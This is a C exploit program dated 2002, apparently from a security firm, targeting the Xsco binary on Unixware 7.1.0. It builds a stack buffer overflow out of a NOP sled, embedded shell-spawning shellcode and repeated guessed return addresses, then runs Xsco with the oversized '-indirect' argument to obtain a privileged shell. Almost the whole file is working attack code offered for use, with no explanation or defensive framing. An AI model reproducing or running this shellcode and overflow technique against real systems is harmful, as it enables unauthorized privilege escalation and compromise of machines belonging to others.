/*
 *  Unixware 7.1.0 xploit for Xsco
 *
 *  By: Fermín J. Serna <fjserna@ngsec.com>
 *      Next Generation Security Technologies
 *      http://www.ngsec.com
 *
 *  This is not the overflow discovered by K2 of ADM 
 *
 *  Madrid 01/01/2002
 *
 */

#include <string.h>

#define SIZE 2064+1
#define NOP 0x90
#define OFFSET 500
#define NUM_ADDR 8

char shellcode[]= /* zhodiac@softhome.net */
"\xeb\x17\x5e\x31\xdb\x88\x5e\x07\x89\x5e\x0c\x88\x5e\x11\xb3\x2e"
"\xfe\xc3\x88\x1e\x88\x5e\x04\xeb\x18\xe8\xe4\xff\xff\xff\x5a\x62"
"\x69\x6e\x5a\x73\x68\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"
"\xc3\x31\xdb\x31\xc0\x53\xb0\x17\xe8\xec\xff\xff\xff\x53\xb0\x2e"
"\xe8\xe4\xff\xff\xff\xb0\x3b\x53\x53\x56\x56\xeb\xdc";

long get_esp() { __asm__("movl %esp,%eax"); }

int main(int argc, char **argv) {
char buffer[SIZE];
char *ch_ptr;
unsigned long *lg_ptr;
int counter;

 printf("Xsco xploit for Unixware 7.1.0 by Fermín J. Serna <fjserna@ngsec.com>");
 printf("Next Generation Security Technologies http://www.ngsec.com");


 ch_ptr=buffer;
 memset(ch_ptr,NOP,sizeof(buffer)-strlen(shellcode)-NUM_ADDR*4-1);
 ch_ptr+=sizeof(buffer)-strlen(shellcode)-NUM_ADDR*4-1;
 memcpy(ch_ptr,shellcode,strlen(shellcode));
 ch_ptr+=strlen(shellcode);
 lg_ptr=(unsigned long *)ch_ptr;
 for(counter=0;counter<NUM_ADDR;counter++) *(lg_ptr++)=get_esp()+OFFSET;
 ch_ptr=(char *)lg_ptr;
 *(ch_ptr++)='\0';

 printf("Len: %d Return address: %#x\n",strlen(buffer),get_esp()+OFFSET);
 execl("/usr/X/bin/Xsco","Xsco","-indirect", buffer, NULL); 

}